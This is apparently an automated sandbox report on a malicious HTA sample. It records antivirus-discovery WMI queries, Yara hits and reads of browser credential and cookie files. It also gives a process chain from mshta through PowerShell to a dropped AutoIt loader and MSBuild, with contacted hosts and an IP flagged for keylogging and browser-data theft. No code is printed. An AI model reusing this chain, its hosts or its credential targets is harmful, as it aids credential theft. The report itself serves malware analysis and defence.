                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 16.3.AutoIt3.exe.54c5d6c.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.updater.exe.4a76e70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.updater.exe.4a76e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 21.2.AutoIt3.exe.44b6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.AutoIt3.exe.42f6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000002.1758635983.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000003.1897385765.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.1898870666.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1973071322.00000000053C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.1755407197.0000000005984000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000002.1976845704.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000003.1898510626.0000000005204000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.1901630344.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.1754103601.0000000005C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1972605812.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: updater.exe PID: 2668, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AutoIt3.exe PID: 3148, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 1728, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AutoIt3.exe PID: 1296, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: AutoIt3.exe | Binary or memory string: WIN_81
                    Source: AutoIt3.exe | Binary or memory string: WIN_XP
                    Source: AutoIt3.exe | Binary or memory string: WIN_XPe
                    Source: AutoIt3.exe | Binary or memory string: WIN_VISTA
                    Source: AutoIt3.exe | Binary or memory string: WIN_7
                    Source: AutoIt3.exe | Binary or memory string: WIN_8
                    Source: AutoIt3.exe, 00000015.00000003.1971061934.000000000573B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara match | File source: 16.3.AutoIt3.exe.54c5d6c.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.updater.exe.4a76e70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.updater.exe.4a76e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 21.2.AutoIt3.exe.44b6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.AutoIt3.exe.42f6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000002.1758635983.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000003.1897385765.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.1898870666.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1973071322.00000000053C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.1755407197.0000000005984000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000002.1976845704.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000003.1898510626.0000000005204000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.1901630344.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.1754103601.0000000005C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1972605812.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: updater.exe PID: 2668, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AutoIt3.exe PID: 3148, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 1728, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AutoIt3.exe PID: 1296, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 16.3.AutoIt3.exe.54c5d6c.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.updater.exe.4a76e70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.updater.exe.4a76e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 21.2.AutoIt3.exe.44b6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.AutoIt3.exe.42f6e70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000002.1758635983.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000003.1897385765.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.1898870666.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1973071322.00000000053C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.1755407197.0000000005984000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000002.1976845704.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000003.1898510626.0000000005204000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.1901630344.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000003.1754103601.0000000005C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1972605812.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: updater.exe PID: 2668, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AutoIt3.exe PID: 3148, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 1728, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AutoIt3.exe PID: 1296, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0103696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 14_2_0103696E
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01036E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 14_2_01036E32
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A1696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 16_2_00A1696E
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A16E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 16_2_00A16E32
                    MITRE ATT&CK Matrix (techniques listed per tactic; a technique matched by the analysis carries its count in parentheses)

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                    Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    Execution: Windows Management Instrumentation (221); Native API (1); Command and Scripting Interpreter (2); PowerShell (3); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                    Persistence: DLL Side-Loading (1); Create Account (1); Valid Accounts (2); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (12); Registry Run Keys / Startup Folder (1); Startup Items; Scheduled Task/Job; At
                    Defense Evasion: Disable or Modify Tools (21); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); DLL Side-Loading (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (241); Access Token Manipulation (21); Process Injection (12)
                    Credential Access: OS Credential Dumping (1); Input Capture (121); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (159); Security Software Discovery (251); Virtualization/Sandbox Evasion (241); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                    Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (1); Input Capture (121); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    Command and Control: Ingress Tool Transfer (2); Encrypted Channel (11); Non-Standard Port (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                    Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                    Behavior Graph (ID: 1576532; Sample: payload_1.hta; Start date: 17/12/2024; Architecture: WINDOWS; Score: 100)

                    Contacted hosts: nopaste.net; x1.i.lencr.org; 7 other IPs or domains
                    Top-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); 6 other signatures

                    Process tree:
                    - mshta.exe (signature: Suspicious powershell command line found)
                      - powershell.exe (network: google.com 142.250.181.142, 443, 49714, 49715 GOOGLEUS United States; www.google.com 172.217.19.228, 443, 49717, 49731 GOOGLEUS United States; signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy; Powershell drops PE file)
                        - powershell.exe (network: nopaste.net 174.138.125.138, 443, 49710 DIGITALOCEAN-ASNUS United States; docu-signer.com 104.21.87.65, 443, 49713, 49728 CLOUDFLARENETUS United States; dropped: C:\Users\user\AppData\Local\...\updater.exe, PE32)
                          - updater.exe (dropped: C:\faggbgb\AutoIt3.exe, PE32)
                            - MSBuild.exe (network: 185.147.124.236, 15647, 49735, 49737 E-STYLEISP-ASRU Russian Federation; signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Contains functionality to register a low level keyboard hook; Tries to harvest and steal browser information (history, passwords, etc))
                          - conhost.exe
                        - Acrobat.exe
                          - AcroCEF.exe
                            - AcroCEF.exe
                        - conhost.exe
                    - AutoIt3.exe
                      - MSBuild.exe
                      - MSBuild.exe
                    - AutoIt3.exe
                      - MSBuild.exe

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.